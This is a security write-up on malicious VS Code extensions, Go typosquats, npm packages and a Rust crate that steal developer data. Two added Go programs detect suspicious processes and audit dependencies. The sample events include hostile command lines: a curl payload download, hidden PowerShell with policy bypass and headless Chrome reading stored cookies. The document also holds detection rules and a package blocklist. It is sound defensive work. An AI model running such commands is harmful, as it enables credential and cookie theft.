Malicious Developer Ecosystem Packages Found (VS Code, Go, npm, Rust)

Cybersecurity researchers have uncovered malicious packages across multiple developer ecosystems — VS Code extensions, Go libraries, npm modules, and Rust crates — all designed to steal sensitive developer data and exfiltrate it to endpoints the attackers control or monitor, including third-party paste and webhook services.

Malicious VS Code Extensions

  • BigBlack.bitcoin-black (16 installs)
  • BigBlack.codo-ai (25 installs)
  • BigBlack.mrbigblacktheme (removed by Microsoft)

Behavior:

  • Masquerade as a dark theme or an AI coding assistant.
  • Download additional payloads and capture screenshots, clipboard contents, saved Wi-Fi passwords, and browser session data.
  • Abuse the legitimate Lightshot screenshot binary to load a malicious Lightshot.dll (DLL hijacking), which gathers:
    • Installed applications and running processes
    • Desktop screenshots
    • Stored Wi-Fi credentials
    • Chrome/Edge cookies, read by launching the browser in headless mode

Evolution:

  • Early versions → spawned a visible PowerShell window, which tipped off users.
  • Later versions → switched to a hidden batch script that fetches the payload with curl, so nothing appears on screen.
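The process-level tells in the two lists above (a shell spawned by the IDE with a non-interactive switch, a hidden PowerShell window, curl writing into the temp directory, a headless browser with remote debugging) can be turned into detection logic, which is also what the "Monitor developer endpoints" recommendation below asks for. The Go program here is an added example, not code from the write-up or from any vendor: it runs four such rules over a constructed set of process-creation events whose paths, file names and download host are placeholders. The field names on ProcessEvent and the --remote-debugging-port detail for cookie theft are this example's assumptions.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// ProcessEvent is a simplified process-creation record (parent image, image,
// command line). It mirrors a Sysmon Event ID 1 row, but the type is this example's own.
type ProcessEvent struct {
	ParentImage string
	Image       string
	CommandLine string
}

// Finding pairs the rule that fired with the event that triggered it.
type Finding struct {
	Rule  string
	Event ProcessEvent
}

// exe returns the lower-cased file name of an image path; backslashes are
// normalised first so the logic also runs on a non-Windows analysis host.
func exe(image string) string {
	return strings.ToLower(filepath.Base(strings.ReplaceAll(image, `\`, "/")))
}

// containsAll reports whether every needle occurs in the command line, ignoring case.
func containsAll(cmdline string, needles ...string) bool {
	l := strings.ToLower(cmdline)
	for _, n := range needles {
		if !strings.Contains(l, strings.ToLower(n)) {
			return false
		}
	}
	return true
}

// containsAny reports whether at least one needle occurs in the command line.
func containsAny(cmdline string, needles ...string) bool {
	for _, n := range needles {
		if containsAll(cmdline, n) {
			return true
		}
	}
	return false
}

// Detect applies four heuristics drawn from the behaviour described above. The
// rules are independent, so one event can produce more than one Finding.
func Detect(events []ProcessEvent) []Finding {
	var out []Finding
	for _, ev := range events {
		parent, child := exe(ev.ParentImage), exe(ev.Image)
		isShell := child == "cmd.exe" || child == "powershell.exe" || child == "pwsh.exe"
		cmd := ev.CommandLine
		// VS Code launching a non-interactive shell one-liner; the integrated terminal starts without /c or -File.
		if parent == "code.exe" && isShell && containsAny(cmd, " /c ", " -c ", " -command ", " -file ") {
			out = append(out, Finding{"ide-spawned-script", ev})
		}
		// PowerShell with its window hidden, the change made after the visible window alerted users.
		if (child == "powershell.exe" || child == "pwsh.exe") && containsAny(cmd, "-windowstyle hidden", "-w hidden") {
			out = append(out, Finding{"hidden-powershell", ev})
		}
		// curl saving a download into the user's temp directory, the quiet payload-delivery path.
		if child == "curl.exe" && containsAny(cmd, " -o ", "--output") && containsAny(cmd, `\temp\`, "%temp%") {
			out = append(out, Finding{"curl-download-to-temp", ev})
		}
		// Chromium started headless with remote debugging on (the port flag is this example's assumption).
		if (child == "chrome.exe" || child == "msedge.exe") && containsAll(cmd, "--headless", "--remote-debugging-port") {
			out = append(out, Finding{"headless-browser-debug", ev})
		}
	}
	return out
}

// SampleEvents is a constructed process tree: two ordinary developer actions, then
// the chain an infected extension would produce. Paths and the host are placeholders.
func SampleEvents() []ProcessEvent {
	code := `C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe`
	cmd := `C:\Windows\System32\cmd.exe`
	ps := `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`
	chrome := `C:\Program Files\Google\Chrome\Application\chrome.exe`
	return []ProcessEvent{
		{code, cmd, `"C:\Windows\System32\cmd.exe"`},
		{`C:\Windows\explorer.exe`, chrome, `chrome.exe --profile-directory=Default`},
		{code, cmd, `cmd.exe /c "C:\Users\dev\AppData\Local\Temp\stage.bat"`},
		{cmd, `C:\Windows\System32\curl.exe`, `curl.exe -s -o C:\Users\dev\AppData\Local\Temp\ls.zip https://downloads.example.invalid/ls.zip`},
		{cmd, ps, `powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\dev\AppData\Local\Temp\run.ps1`},
		{ps, chrome, `chrome.exe --headless --remote-debugging-port=9222 --user-data-dir="C:\Users\dev\AppData\Local\Google\Chrome\User Data"`},
	}
}

func main() {
	for _, f := range Detect(SampleEvents()) {
		fmt.Printf("[%s] %s -> %s\n", f.Rule, exe(f.Event.ParentImage), f.Event.CommandLine)
	}
}
```

The ide-spawned-script rule is deliberately narrow: VS Code legitimately launches cmd.exe and powershell.exe for its integrated terminal, so the rule only fires when the child is started with a non-interactive switch such as /c or -File. On real Sysmon or EDR data, map the vendor's field names onto ProcessEvent and tune the temp-directory and debugging-port patterns to what your fleet actually emits.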

Malicious Go Packages

  • github[.]com/bpoorman/uuid
  • github[.]com/bpoorman/uid

Technique:

  • Typosquat trusted UUID libraries (google/uuid and pborman/uuid): "bpoorman" is one transposition and one extra letter away from "pborman".
  • Exfiltrate data to the dpaste paste service, but only when a developer calls the bogus helper function valid(), so the code stays inert until the lure is used.

Malicious npm Packages

  • 420+ packages published by a likely French-speaking actor.
  • Naming pattern: elf-stats-*.

Capabilities:

  • Reverse shell execution.
  • File exfiltration to Pipedream endpoints.

Malicious Rust Crate

  • finch-rust (published by “faceless”).
  • Impersonates the legitimate bioinformatics tool finch.

Loader behavior:

  • Contains mostly legitimate code.
  • A single hidden line pulls in the sha-rust payload, a credential stealer.
  • Splitting loader from payload makes detection harder: the crate under review looks benign while the malicious logic lives in a secondary package.

Why This Matters

  • Developers are prime targets: attackers gain access to source code, credentials, and collaboration tools (Slack, email).
  • Supply chain risk: malicious packages infiltrate trusted ecosystems (VS Code Marketplace, npm, Go, Rust).
  • Stealth tactics: DLL hijacking, typosquatting, hidden batch scripts, and modular loaders complicate detection.

Defensive Recommendations

  • Audit dependencies: Check manifests and lockfiles for the names above (BigBlack.*, elf-stats-*, bpoorman/*, finch-rust) and for near-misses of the packages you actually use.
  • Use trusted sources: Verify publishers and package signatures.
  • Monitor developer endpoints: Look for abnormal PowerShell, curl, or headless browser activity, especially when it is spawned from the IDE process.
  • Educate developers: Warn against installing unverified extensions or libraries.
  • Implement supply chain security tools: Use scanners (e.g., Socket, Snyk) to detect malicious or typosquatted packages.
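The typosquatting in the Go section and the "Audit dependencies" recommendation above both come down to one check: compare every manifest entry against a blocklist and against the genuine packages it might be imitating. The Go program below is an added example, not tooling from the write-up or from Socket or Snyk. It flags exact and prefix blocklist matches, names within edit distance 2 of a trusted package (bpoorman/uuid versus pborman/uuid) and trusted names with a suffix appended (finch-rust versus finch). The trusted list and the sample dependencies are constructed, and elf-stats-collector is an invented name that follows the campaign's pattern rather than a package from it.

```go
package main

import (
	"fmt"
	"strings"
)

// Dependency is one manifest entry tagged with its ecosystem, so names are only
// compared against the registry they came from.
type Dependency struct{ Ecosystem, Name string }

// Alert records why a dependency was flagged; one dependency may raise several.
type Alert struct {
	Dep    Dependency
	Reason string
}

// blocklist holds the names the write-up lists; a trailing '*' means prefix match.
var blocklist = map[string][]string{
	"vscode": {"BigBlack.*"},
	"npm":    {"elf-stats-*"},
	"go":     {"github.com/bpoorman/*"},
	"cargo":  {"finch-rust"},
}

// trusted is a per-ecosystem allowlist of the genuine packages that typosquats
// imitate. This short list is the example's own; seed it from your real dependency graph.
var trusted = map[string][]string{
	"go":    {"github.com/google/uuid", "github.com/pborman/uuid"},
	"cargo": {"finch"},
}

// levenshtein returns the insert/delete/substitute edit distance between two
// ASCII package names, using a two-row dynamic-programming table.
func levenshtein(a, b string) int {
	prev := make([]int, len(b)+1)
	for j := range prev {
		prev[j] = j
	}
	for i := 1; i <= len(a); i++ {
		cur := make([]int, len(b)+1)
		cur[0] = i
		for j := 1; j <= len(b); j++ {
			best := prev[j-1] // substitution, free when the bytes match
			if a[i-1] != b[j-1] {
				best++
			}
			if prev[j]+1 < best { // deletion
				best = prev[j] + 1
			}
			if cur[j-1]+1 < best { // insertion
				best = cur[j-1] + 1
			}
			cur[j] = best
		}
		prev = cur
	}
	return prev[len(b)]
}

// Audit checks each dependency against the blocklist, then against the trusted
// names of its ecosystem for near-misses (distance <= 2) and for suffix
// impersonation such as finch-rust for finch. Exact trusted names are never flagged.
func Audit(deps []Dependency) []Alert {
	var alerts []Alert
	for _, d := range deps {
		name := strings.ToLower(d.Name)
		for _, pat := range blocklist[d.Ecosystem] {
			pat = strings.ToLower(pat)
			if name == pat || (strings.HasSuffix(pat, "*") && strings.HasPrefix(name, strings.TrimSuffix(pat, "*"))) {
				alerts = append(alerts, Alert{d, "matches blocklist entry " + pat})
			}
		}
		for _, t := range trusted[d.Ecosystem] {
			t = strings.ToLower(t)
			if name == t {
				continue // the genuine package
			}
			if dist := levenshtein(name, t); dist <= 2 {
				alerts = append(alerts, Alert{d, fmt.Sprintf("edit distance %d from trusted %s", dist, t)})
			} else if strings.HasPrefix(name, t+"-") || strings.HasPrefix(name, t+"_") {
				alerts = append(alerts, Alert{d, "trusted name " + t + " with a suffix appended"})
			}
		}
	}
	return alerts
}

// SampleDeps is a constructed manifest excerpt: genuine packages mixed with the
// names from the write-up. elf-stats-collector is an invented name following the pattern.
func SampleDeps() []Dependency {
	return []Dependency{
		{"go", "github.com/google/uuid"},
		{"go", "github.com/bpoorman/uuid"},
		{"npm", "lodash"},
		{"npm", "elf-stats-collector"},
		{"cargo", "finch"},
		{"cargo", "finch-rust"},
		{"vscode", "BigBlack.codo-ai"},
	}
}
```

Feed Audit with names pulled from go.mod, package.json, Cargo.lock and the output of `code --list-extensions`, one ecosystem tag per source. The suffix rule is the noisiest of the three, since many ecosystems have pairs like serde and serde_json sitting side by side, so treat that alert as a prompt to verify the publisher rather than as an automatic block; the distance and blocklist rules are precise enough to fail a build on.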

Final Thought

This campaign shows how attackers are weaponizing developer ecosystems to gain access to sensitive data and credentials. Even seemingly harmless tools — a theme, an AI assistant, or a helper library — can be Trojan horses.
